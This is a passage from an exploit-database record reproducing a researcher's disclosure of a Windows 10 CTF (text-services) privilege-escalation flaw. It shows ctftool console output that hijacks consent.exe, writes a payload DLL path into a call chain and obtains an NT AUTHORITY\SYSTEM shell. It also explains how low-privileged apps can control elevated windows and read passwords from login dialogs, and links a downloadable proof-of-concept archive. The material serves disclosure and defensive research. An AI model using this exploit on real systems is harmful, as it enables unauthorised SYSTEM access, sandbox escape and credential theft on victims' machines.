4020, ctftool.exe)\r\nClient 1, Tid 4656 (Flags 0x1000000c, Hwnd 00001230, Pid 2336, LogonUI.exe)\r\nClient 2, Tid 8692 (Flags 0x1000000c, Hwnd 000021F4, Pid 2336, LogonUI.exe)\r\nClient 3, Tid 4808 (Flags 0x10000008, Hwnd 000012C8, Pid 4440, TabTip.exe)\r\nClient 4, Tid 8800 (Flags 0x1000000c, Hwnd 00002260, Pid 8536, Utilman.exe)\r\nClient 5, Tid 6788 (Flags 0x10000008, Hwnd 00001A84, Pid 6628, osk.exe)\r\n\r\n\r\nI finished the exploit, it reliably gets NT AUTHORITY\\SYSTEM from an unprivileged user on up-to-date Windows 10 1903.\r\n\r\nI sent Microsoft a finished version.\r\n\r\nHere is the current source code, and a video demonstrating it. I think the best targets are either logonui.exe or consent.exe, both run as SYSTEM.\r\n\r\nhttps://www.youtube.com/watch?v=JUbac3OLPaM\r\n\r\n$ ./ctftool.exe \r\nAn interactive ctf exploration tool by @taviso.\r\nType \"help\" for available commands.\r\nMost commands require a connection, see \"help connect\".\r\nctf> script .\\scripts\\ctf-consent-system.ctf\r\nAttempting to copy exploit payload...\r\n 1 file(s) copied.\r\n\r\nRight click something and select \"Run as Administrator\", then wait for a SYSTEM shell...\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n!!! YOU DONT NEED TO KNOW ANY PASSWORD, JUST WAIT! !!!\r\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nThe ctf server port is located at \\BaseNamedObjects\\msctf.serverDefault1\r\nConnected to CTF [email\u00a0protected]\\BaseNamedObjects\\msctf.serverDefault1, Handle 00000244\r\nWaiting for the consent dialog to join the session...\r\nFound new client consent.exe, DefaultThread now 6900\r\nconsent.exe has joined the session, starting exploit...\r\nCommand succeeded, stub created\r\nDumping Marshal Parameter 3 (Base 011E89C0, Type 0x106, Size 0x18, Offset 0x40)\r\n000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c M..q(....*..[.C\\\r\n000010: 01 00 00 00 6c 4a af 03 ....lJ..\r\nMarshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x3af4a6c\r\n0x7ff8cf290000\r\n0x7ff8cf340000\r\n0x7ff8cffe0000\r\n0x7ff8cf340000\r\nGuessed kernel32 => C:\\WINDOWS\\system32\\kernel32.DLL\r\nC:\\WINDOWS\\system32\\kernel32.DLL is a 64bit module.\r\n[email\u00a0protected]+0x1eb60\r\nThe CFG call chain is built, writing in parameters...\r\nWriting in the payload path \"C:\\WINDOWS\\TEMP\\EXPLOIT.DLL\"...\r\n0x7ff8cfc40000\r\nPayload created and call chain ready, get ready...\r\nC:\\WINDOWS\\system32>whoami\r\nnt authority\\system\r\n\r\n\r\nIf you have an input profile with enhanced capabilities available (in general, if you use an IME then you do - Chinese, Korean, Japanese, etc.), then a low privileged application on the same session can read and write data to a higher privileged application.\r\n\r\nThe user doesn't need to have the language selected, because a CTF client can change active profile too, but it does have to be installed.\r\n\r\nThe problem with this is that a low privileged application can take control of an elevated command prompt, escape a low-integrity sandbox, escape AppContainer/LPAC, read passwords out of login dialogs/consent dialogs, and so on.\r\n\r\nThis means UIPI basically doesn't work any more.\r\n\r\nI've attached a ctf script that will wait for you to open notepad, and then write some text into it. Here is a screenshot of a low privileged ctftool typing into an Administrator console.\r\n\r\nPlease note, if you *only* have languages installed that doesn't use an Out-of-process TIP (English, German, French, Polish, etc), you are likely unaffected (or at least, I don't know how to exploit it yet). Right now, it's mostly users in Asia affected by this, but I'm admittedly ignorant about i18n and a11y.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47258.zip\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33126"}]}